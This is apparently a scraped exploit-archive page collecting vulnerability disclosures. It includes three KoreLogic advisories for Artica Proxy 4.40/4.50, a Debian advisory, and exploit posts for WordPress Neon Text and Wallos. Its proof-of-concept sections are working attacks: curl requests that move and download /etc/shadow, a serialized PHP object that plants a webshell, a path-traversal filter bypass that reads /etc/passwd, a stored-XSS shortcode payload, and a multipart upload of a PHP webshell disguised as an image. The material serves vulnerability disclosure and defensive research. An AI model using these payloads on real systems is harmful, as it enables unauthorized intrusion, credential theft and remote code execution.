The Rich Filemanager feature of Artica Proxy versions 4.40 and 4.50 provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user. This provides an unauthenticated attacker complete access to the file system.

    KL-001-2024-003: Artica Proxy Unauthenticated File Manager VulnerabilityTitle: Artica Proxy Unauthenticated File Manager VulnerabilityAdvisory ID: KL-001-2024-003Publication Date: 2024.03.05Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt1. Vulnerability Details      Affected Vendor: Artica      Affected Product: Artica Proxy      Affected Version: 4.40 and 4.50      Platform: Debian 10 LTS      CWE Classification: CWE-288: Authentication Bypass Using an                          Alternate Path or Channel, CWE-552: Files                          or Directories Accessible to External                          Parties      CVE ID: CVE-2024-20552. Vulnerability Description      The "Rich Filemanager" feature of Artica Proxy provides a      web-based interface for file management capabilities. When      the feature is enabled, it does not require authentication by      default, and runs as the root user.3. Technical Description      The Artica Proxy can be installed with a small amount of      "Features" enabled. Within the administrative web interface,      additional features can be installed, enabled, and disabled. The      "Rich Filemanager" feature is disabled by default. Enabling      this feature will spawn a listener on port 5000/tcp bound to      0.0.0.0. By default, when this feature is enabled, authentication      is not required to access the web interface. The "Rich      Filemanager" runs as the root user. This provides an      unauthenticated attacker complete access to the file system.        root@artica:~# ps -efww | grep -i File        root      1888  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER        root      1889  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER      This can be exploited by an attacker to add entries in to      /etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create      an additional root-level account that has the ability to SSH      in to the system.4. Mitigation and Remediation Recommendation      No response from vendor. Rich Filemanager feature is disabled      by default. Leave it that way.5. Credit      This vulnerability was discovered by Jim Becher of KoreLogic,      Inc.6. Disclosure Timeline      2023.12.18 - KoreLogic requests vulnerability contact and                   secure communication method from Artica.      2023.12.18 - Artica Support issues automated ticket #1703011342                   promising follow-up from a human.      2024.01.10 - KoreLogic again requests vulnerability contact and                   secure communication method from Artica.      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from                   mail.articatech.com with response                   "Client host rejected: Go Away!"      2024.01.11 - KoreLogic requests vulnerability contact and                   secure communication method via                   https://www.articatech.com/ 'Contact Us' web form.      2024.01.23 - KoreLogic requests CVE from MITRE.      2024.01.23 - MITRE issues automated ticket #1591692 promising                   follow-up from a human.      2024.02.01 - 30 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.06 - KoreLogic requests update on CVE from MITRE.      2024.02.15 - KoreLogic requests update on CVE from MITRE.      2024.02.22 - KoreLogic reaches out to alternate CNA for                   CVE identifiers.      2024.02.26 - 45 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.29 - Vulnerability details presented to AHA!                   (takeonme.org) by proxy.      2024.03.01 - AHA! issues CVE-2024-2055 to track this                   vulnerability.      2024.03.05 - KoreLogic public disclosure.7. Proof of Concept      Step 1: Move /etc/shadow to /tmp/shadow      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198'{"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}}      Step 2: Download /tmp/shadow      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H $'Cache-Control: no-cache' $'http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870'root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::      daemon:*:19507:0:99999:7:::      bin:*:19507:0:99999:7:::      sys:*:19507:0:99999:7:::      sync:*:19507:0:99999:7:::      games:*:19507:0:99999:7:::      man:*:19507:0:99999:7:::      lp:*:19507:0:99999:7:::      mail:*:19507:0:99999:7:::      news:*:19507:0:99999:7:::      uucp:*:19507:0:99999:7:::      proxy:*:19507:0:99999:7:::      www-data:*:19507:0:99999:7:::      backup:*:19507:0:99999:7:::      list:*:19507:0:99999:7:::      irc:*:19507:0:99999:7:::      gnats:*:19507:0:99999:7:::      nobody:*:19507:0:99999:7:::      _apt:*:19507:0:99999:7:::      systemd-timesync:*:19507:0:99999:7:::      systemd-network:*:19507:0:99999:7:::      systemd-resolve:*:19507:0:99999:7:::      messagebus:*:19507:0:99999:7:::      quagga:*:19507:0:99999:7:::      apt-mirror:*:19507:0:99999:7:::      privoxy:*:19507:0:99999:7:::      ntp:*:19507:0:99999:7:::      redsocks:!:19507:0:99999:7:::      prads:*:19507:0:99999:7:::      freerad:*:19507:0:99999:7:::      vnstat:*:19507:0:99999:7:::      stunnel4:!:19507:0:99999:7:::      sshd:*:19507:0:99999:7:::      vde2-net:*:19507:0:99999:7:::      memcache:!:19507:0:99999:7:::      davfs2:*:19507:0:99999:7:::      ziproxy:!:19507:0:99999:7:::      proftpd:!:19507:0:99999:7:::      ftp:*:19507:0:99999:7:::      mosquitto:*:19507:0:99999:7:::      openldap:!:19507:0:99999:7:::      munin:*:19507:0:99999:7:::      msmtp:*:19507:0:99999:7:::      Debian-snmp:!:19507:0:99999:7:::      opendkim:*:19507:0:99999:7:::      avahi:*:19507:0:99999:7:::      glances:*:19507:0:99999:7:::      ArticaStats:!:19507:0:99999:7:::      netdata:!:19507:0:99999:7:::      mysql:!:19507:0:99999:7:::      postfix:!:19507:0:99999:7:::      squid:!:19507:0:99999:7:::      smokeping:!:19507:0:99999:7:::      unbound:!:19645:0:99999:7:::      Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208'{"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}}The contents of this advisory are copyright(c) 2024KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Artica Proxy 4.40 / 4.50 Authentication Bypass / Privilege Escalation

The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the www-data user. Version 4.50 is affected.

KL-001-2024-002: Artica Proxy Unauthenticated PHP Deserialization Vulnerability

Title: Artica Proxy Unauthenticated PHP Deserialization Vulnerability  
Advisory ID: KL-001-2024-002  
Publication Date: 2024.03.05  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt

1. Vulnerability Details

      Affected Vendor: Artica  
      Affected Product: Artica Proxy  
      Affected Version: 4.50  
      Platform: Debian 10 LTS  
      CWE Classification: CWE-502 Deserialization of Untrusted Data  
      CVE ID: CVE-2024-2054

2. Vulnerability Description

      The Artica Proxy administrative web application will deserialize  
      arbitrary PHP objects supplied by unauthenticated users and  
      subsequently enable code execution as the "www-data" user.

3. Technical Description

      Prior to authentication, a user can send an HTTP request  
      to the "/wizard/wiz.wizard.progress.php" endpoint. This  
      endpoint processes the "build-js" query parameter by base64  
      decoding the provided value and then calling the "unserialize"  
      PHP function with the decoded value as input.

      Code snippet from "wiz.wizard.progress.php":

        if(isset($_GET["build-js"])){buildjs();exit;}  
        ...  
        $ARRAY=unserialize(base64_decode($_GET["build-js"]));

      To exploit this vulnerability, a user can leverage the  
      installed "Net_DNS2" library autoloader to instantiate the  
      "Net_DNS2_Cache_File" class. The "__destruct" method  
      within this class will write to arbitrary files defined  
      by the class:

        public function __destruct()  
        {  
            //  
            // if there's no cache file set, then there's nothing to do  
            //  
            if (strlen($this->cache_file) == 0) {  
                return;  
            }

            //  
            // open the file for reading/writing  
            //  
            $fp = fopen($this->cache_file, 'a+');  
            if ($fp !== false) {  
            ...  
            if (!is_null($data)) {

                //  
                // write the file contents  
                //  
                fwrite($fp, $data);  
            }

      An unauthenticated user can overwrite existing files and  
      insert a webshell to execute malicious PHP as the "www-data"  
      user.

4. Mitigation and Remediation Recommendation

      No response from vendor. This vulnerability can be remediated  
      by deleting the 'usr/share/artica-postfix/wizard' directory  
      if it is not needed. Otherwise, move it to a location outside  
      of the web root.

5. Credit

      This vulnerability was discovered by Jaggar Henry of KoreLogic,  
      Inc.

6. Disclosure Timeline

      2023.12.18 - KoreLogic requests vulnerability contact and  
                   secure communication method from Artica.  
      2023.12.18 - Artica Support issues automated ticket #1703011342  
                   promising follow-up from a human.  
      2024.01.10 - KoreLogic again requests vulnerability contact and  
                   secure communication method from Artica.  
      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from  
                   mail.articatech.com with response  
                   "Client host rejected: Go Away!"  
      2024.01.11 - KoreLogic requests vulnerability contact and  
                   secure communication method via  
                   https://www.articatech.com/ 'Contact Us' web form.  
      2024.01.23 - KoreLogic requests CVE from MITRE.  
      2024.01.23 - MITRE issues automated ticket #1591692 promising  
                   follow-up from a human.  
      2024.02.01 - 30 business days have elapsed since KoreLogic  
                   attempted to contact the vendor.  
      2024.02.06 - KoreLogic requests update on CVE from MITRE.  
      2024.02.15 - KoreLogic requests update on CVE from MITRE.  
      2024.02.22 - KoreLogic reaches out to alternate CNA for  
                   CVE identifiers.  
      2024.02.26 - 45 business days have elapsed since KoreLogic  
                   attempted to contact the vendor.  
      2024.02.29 - Vulnerability details presented to AHA!  
                   (takeonme.org) by proxy.  
      2024.03.01 - AHA! issues CVE-2024-2054 to track this  
                   vulnerability.  
      2024.03.05 - KoreLogic public disclosure.

7. Proof of Concept

      To overwrite the "wiz.upload.php" file to contain a PHP  
      webshell, the following serialized object can be base64  
      encoded and submitted via the "build-js" query parameter:

O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?php   
system($_GET['cmd']); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}}

        $ ARTICA_URL="https://127.0.0.1:9000"; PAYLOAD_CMD="id"; curl -k   
"$ARTICA_URL/wizard/wiz.wizard.progress.php?build-js=TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI6NDp7czoxMDoiY2FjaGVfZmlsZSI7czo0NzoiL3Vzci9zaGFyZS9hcnRpY2EtcG9zdGZpeC93aXphcmQvd2l6LnVwbG9hZC5waHAiO3M6MTY6ImNhY2hlX3NlcmlhbGl6ZXIiO3M6NDoianNvbiI7czoxMDoiY2FjaGVfc2l6ZSI7aTo5OTk5OTk5OTk5O3M6MTA6ImNhY2hlX2RhdGEiO2E6MTp7czozMDoiPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bIjthOjI6e3M6MTA6ImNhY2hlX2RhdGUiO2k6MDtzOjM6InR0bCI7aTo5OTk5OTk5OTk5O319fQ%3d%3d"   
&& curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD";

      {"uid=33(www-data) gid=33(www-data) groups=33(www-data)  
       ":{"cache_date":1696883506,"ttl":8303116493}}

The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Artica Proxy 4.50 Unauthenticated PHP Deserialization

Artica Proxy versions 4.40 and 4.50 suffer from a local file inclusion protection bypass vulnerability that allows for path traversal.

    KL-001-2024-001: Artica Proxy Unauthenticated LFI Protection Bypass VulnerabilityTitle: Artica Proxy Unauthenticated LFI Protection Bypass VulnerabilityAdvisory ID: KL-001-2024-001Publication Date: 2024.03.05Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt1. Vulnerability Details      Affected Vendor: Artica      Affected Product: Artica Proxy      Affected Version: 4.40 and 4.50      Platform: Debian 10 LTS      CWE Classification: CWE-23: Relative Path Traversal      CVE ID: CVE-2024-20532. Vulnerability Description      The Artica Proxy administrative web application attempts to      prevent local file inclusion. These protections can be bypassed      and arbitrary file requests supplied by unauthenticated      users will be returned according to the privileges of the      "www-data" user.3. Technical Description      Prior to authentication, a user can send an HTTP request to      the "images.listener.php" endpoint. This endpoint processes      the "mailattach" query parameter and concatonates the user      supplied value to the "/opt/artica/share/www/attachments/"      file path. The contents of the file located at the newly      created path is returned in the HTTP response body.      The "images.listener.php" endpoint attempts to prevent      a local file inclusion vulnerability by stripping strings      that attempt to traverse into the parent directory from      the user supplied "mailattach" value:$_GET["mailattach"]=str_replace("////","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("///","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("//","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("../","",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("/etc/","",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("passwd","",$_GET["mailattach"]);$file="/opt/artica/share/www/attachments/{$_GET["mailattach"]}";        header("Content-type: application/force-download" );        header("Content-Disposition: attachment; \                filename=\"{$_GET["mailattach"]}\"");        header("Content-Length: ".filesize($file)."" );        header("Expires: 0" );        readfile($file);      If effective, this approach would limit files      accessible by this endpoint to those within the      "/opt/artica/share/www/attachments/" directory. Unfortunately,      the removal of the "../" string is only performed once, so      the resulting file path is not checked.  By using the path      "..././foo.txt", the "images.listener.php" endpoint removes the      "../" string resulting in "../foo.txt" - a relative file path      to traverse to the parent directory.      The strings "/etc/" and "passwd" are also stripped from the file      path as many methods of detecting a path traversal vulnerability      rely on fetching the "/etc/passwd" file. By inserting these      strings into specific locations, a user suppplied "mailattach"      value such as "/epasswdtc/ppasswdasswd" is transformed into      "/etc/passwd", bypassing the protection entirely.      An unauthenticated user can leverage this endpoint to read      files on the system, according to the privileges of the      "www-data" user.4. Mitigation and Remediation Recommendation      No response from vendor; no remediation available.5. Credit      This vulnerability was discovered by Jaggar Henry of KoreLogic,      Inc.6. Disclosure Timeline      2023.12.18 - KoreLogic requests vulnerability contact and                   secure communication method from Artica.      2023.12.18 - Artica Support issues automated ticket #1703011342                   promising follow-up from a human.      2024.01.10 - KoreLogic again requests vulnerability contact and                   secure communication method from Artica.      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from                   mail.articatech.com with response                   "Client host rejected: Go Away!"      2024.01.11 - KoreLogic requests vulnerability contact and                   secure communication method via                   https://www.articatech.com/ 'Contact Us' web form.      2024.01.23 - KoreLogic requests CVE from MITRE.      2024.01.23 - MITRE issues automated ticket #1591692 promising                   follow-up from a human.      2024.02.01 - 30 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.06 - KoreLogic requests update on CVE from MITRE.      2024.02.15 - KoreLogic requests update on CVE from MITRE.      2024.02.22 - KoreLogic reaches out to alternate CNA for                   CVE identifiers.      2024.02.26 - 45 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.29 - Vulnerability details presented to AHA!                   (takeonme.org) by proxy.      2024.03.01 - AHA! issues CVE-2024-2053 to track this                   vulnerability.      2024.03.05 - KoreLogic public disclosure.7. Proof of Concept      $ curl -k 'https://192.168.2.129:9000/images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd'      root:x:0:0:root:/root:/bin/bash      daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin      bin:x:2:2:bin:/bin:/usr/sbin/nologin      sys:x:3:3:sys:/dev:/usr/sbin/nologin      sync:x:4:65534:sync:/bin:/bin/sync      games:x:5:60:games:/usr/games:/usr/sbin/nologin      man:x:6:12:man:/var/cache/man:/usr/sbin/nologin      lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin      mail:x:8:8:mail:/var/mail:/usr/sbin/nologin      news:x:9:9:news:/var/spool/news:/usr/sbin/nologin      uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin      proxy:x:13:13:proxy:/bin:/usr/sbin/nologin      www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin      backup:x:34:34:backup:/var/backups:/usr/sbin/nologin      list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin      irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin      gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin      nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin      _apt:x:100:65534::/nonexistent:/usr/sbin/nologin      systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin      systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin      systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin      messagebus:x:104:110::/nonexistent:/usr/sbin/nologin      mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false      quagga:x:106:114:Quagga routing suite,,,:/run/quagga/:/usr/sbin/nologin      apt-mirror:x:107:115::/var/spool/apt-mirror:/bin/sh      privoxy:x:108:65534::/etc/privoxy:/usr/sbin/nologin      ntp:x:109:117::/nonexistent:/usr/sbin/nologin      redsocks:x:110:118::/var/run/redsocks:/usr/sbin/nologin      prads:x:111:120::/home/prads:/usr/sbin/nologin      freerad:x:112:121::/etc/freeradius:/usr/sbin/nologin      vnstat:x:113:122:vnstat daemon,,,:/var/lib/vnstat:/usr/sbin/nologin      stunnel4:x:114:123::/var/run/stunnel4:/usr/sbin/nologin      sshd:x:115:65534::/run/sshd:/usr/sbin/nologin      vde2-net:x:116:124::/var/run/vde2:/usr/sbin/nologin      memcache:x:117:125:Memcached,,,:/nonexistent:/bin/false      davfs2:x:118:126::/var/cache/davfs2:/usr/sbin/nologin      ziproxy:x:119:127::/var/run/ziproxy:/usr/sbin/nologin      proftpd:x:120:65534::/run/proftpd:/usr/sbin/nologin      ftp:x:121:65534::/srv/ftp:/usr/sbin/nologin      mosquitto:x:122:128::/var/lib/mosquitto:/usr/sbin/nologin      openldap:x:123:129:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false      munin:x:124:130:munin application user,,,:/var/lib/munin:/usr/sbin/nologin      msmtp:x:125:131::/var/lib/msmtp:/usr/sbin/nologin      Debian-snmp:x:126:132::/var/lib/snmp:/bin/false      opendkim:x:127:133::/var/run/opendkim:/usr/sbin/nologin      avahi:x:128:134:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin      glances:x:129:135::/var/lib/glances:/usr/sbin/nologinArticaStats:x:1000:1000:ArticaStats:/home/ArticaStats:/bin/bash      Debian-exim:x:130:138::/var/spool/exim4:/usr/sbin/nologin      smokeping:x:131:139:SmokePing daemon,,,:/var/lib/smokeping:/usr/sbin/nologin      debian-spamd:x:132:140::/var/lib/spamassassin:/bin/sh      netdata:x:1001:1002:netdata:/home/netdata:/bin/bash      postfix:x:1002:1001::/home/postfix:/bin/sh      ...      ...The contents of this advisory are copyright(c) 2024KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Artica Proxy 4.40 / 4.50 Local File Inclusion / Traversal

Debian Linux Security Advisory 5635-1 - Aviv Keller discovered that the frames.html file generated by YARD, a documentation generation tool for the Ruby programming language, was vulnerable to cross-site scripting.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5635-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMarch 04, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : yardCVE ID         : CVE-2024-27285Aviv Keller discovered that the frames.html file generated by YARD, adocumentation generation tool for the Ruby programming language, wasvulnerable to cross-site scripting.For the oldstable distribution (bullseye), this problem has been fixedin version 0.9.24-1+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 0.9.28-2+deb12u2.We recommend that you upgrade your yard packages.For the detailed security status of yard please refer toits security tracker page at:https://security-tracker.debian.org/tracker/yardFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXmMwMACgkQEMKTtsN8TjYteA/+OJKIMLYc36uSErez5guFT6OYcCINkwjm8Uv+7S9lkBp3aq80agghHHPwoghyZaW/2VohG/nDEFXh5g/NUPNFT+/044ymLsSMgJOF8C80+K6xJ7C/lHBeqYOMIjxzWuooWe0pL7ZLMpZHIipvbVtlS/M+GkjBudPMptMdk8hxfX3zlNgzJqxvZdE7dOu/eTqUOc+aOXRo7NPXkYfqkzkJxwy6DFnkRMrVd9IvHcYOs3Aw0EQE92QTsB68etFwakgmZZOzLW1ubkYJWGXGKq0ASWuGOlSUGjx62KiGWR53iIGUhY4VEQRUDjmPOVDoxOePO1Vr0W6UPqbsrGqSyKwpU8lqQKqAGbOJyw5XsnOjhu/fk1q9J3DRA/oa8fc/6Vgt+Ys8nOj1YHW+SbxjseRnGFraPqq88ICJ1Lg/UsxHn1RcO1dozClKI+FxLlbyZMFETA1yfy2+iHu6go5jQDTjQHuLk4aUzSAf1y6a8507QWyQSThB+9gehIs+GxTLRzYIOTgB40xrE5vaouVvZb5Qg9j9P1j2DY3+R8+ig+15nnMaVRSAQFaXl+9Vyn3STUox9lvhxBB7tCYEWV4P6IPQqjwsNWMKZR0gfmpJxrql3cUCkFTH68prMfWNbPYfsqVrnVkWQMzkqb1NvAdyYP3TJYEDdG1oI09vIye4d6VXbW4==CnLF-----END PGP SIGNATURE-----

Debian Security Advisory 5635-1

WordPress Neon Text plugin versions 1.1 and below suffer from a persistent cross site scripting vulnerability.

**WordPress Neon Text 1.1 Cross Site Scripting**

Posted Mar 5, 2024

Authored by Eren Car

WordPress Neon Text plugin versions 1.1 and below suffer from a persistent cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2023-5817

SHA-256 | f6fa131d3df7c7fa0667803c7757179d6f0f6967ebbb7d6ee2469662460a8a4e

Download | Favorite | View

**WordPress Neon Text 1.1 Cross Site Scripting**

    # Exploit Title: Wordpress Plugin Neon Text <= 1.1 - Stored Cross Site Scripting (XSS)# Date: 2023-11-15# Exploit Author: Eren Car# Vendor Homepage: https://www.eralion.com/# Software Link: https://downloads.wordpress.org/plugin/neon-text.zip# Category: Web Application# Version: 1.0# Tested on: Debian / WordPress 6.4.1# CVE : CVE-2023-5817# 1. Description:The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in 1.1 and above versions.   # 2. Proof of Concept (PoC):  a. Install and activate version 1.0 of the plugin.  b. Go to the posts page and create new post.  c. Add shorcode block and insert the following payload:      [neontext_box][neontext color='"onmouseover="alert(document.domain)"']TEST[/neontext][/neontext_box]          d. Save the changes and preview the page. Popup window demonstrating the vulnerability will be executed.

**File Tags**

*   ActiveX (933)
*   Advisory (84,370)
*   Arbitrary (16,579)
*   BBS (2,859)
*   Bypass (1,818)
*   CGI (1,032)
*   Code Execution (7,578)
*   Conference (687)
*   Cracker (844)
*   CSRF (3,370)
*   DoS (24,373)
*   Encryption (2,381)
*   Exploit (52,611)
*   File Inclusion (4,246)
*   File Upload (982)
*   Firewall (822)
*   Info Disclosure (2,832)
*   Intrusion Detection (905)
*   Java (3,117)
*   JavaScript (887)
*   Kernel (6,944)
*   Local (14,657)
*   Magazine (586)
*   Overflow (12,989)
*   Perl (1,430)
*   PHP (5,174)
*   Proof of Concept (2,364)
*   Protocol (3,687)
*   Python (1,595)
*   Remote (31,291)
*   Root (3,613)
*   Rootkit (519)
*   Ruby (617)
*   Scanner (1,647)
*   Security Tool (7,962)
*   Shell (3,236)
*   Shellcode (1,217)
*   Sniffer (899)
*   Spoof (2,255)
*   SQL Injection (16,491)
*   TCP (2,420)
*   Trojan (688)
*   UDP (896)
*   Virus (668)
*   Vulnerability (32,461)
*   Web (9,836)
*   Whitepaper (3,768)
*   x86 (966)
*   XSS (18,130)
*   Other

**File Archives**

*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,060)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,978)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,466)
*   HPUX (880)
*   iOS (369)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (48,786)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (487)
*   RedHat (15,203)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,336)
*   UNIX (9,371)
*   UnixWare (187)
*   Windows (6,635)
*   Other

WordPress Neon Text 1.1 Cross Site Scripting

Wallos versions prior to 1.11.2 suffer from a remote shell upload vulnerability.

# Exploit Title: Wallos - File Upload RCE (Authenticated)  
# Date: 2024-03-04  
# Exploit Author: sml@lacashita.com  
# Vendor Homepage: https://github.com/ellite/Wallos  
# Software Link: https://github.com/ellite/Wallos  
# Version: < 1.11.2  
# Tested on: Debian 12

Wallos allows you to upload an image/logo when you create a new subscription.  
This can be bypassed to upload a malicious .php file.

POC  
---

1) Log into the application.  
2) Go to "New Subscription"  
3) Upload Logo and choose your webshell .php  
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:

--- SNIP -----------------

POST /endpoints/subscription/add.php HTTP/1.1

Host: 192.168.1.44

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.44/

Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324

Origin: http://192.168.1.44

Content-Length: 7220

Connection: close

Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="name"

test

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo"; filename="revshell.php"

Content-Type: image/jpeg

GIF89a;

<?php  
system($_GET['cmd']);  
?> 

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo-url"

----- SNIP -----

5) You will get the response that your file was uploaded ok:

{"status":"Success","message":"Subscription updated successfully"}

6) Your file will be located in:   
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php

Wallos Shell Upload

Debian Linux Security Advisory 5634-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

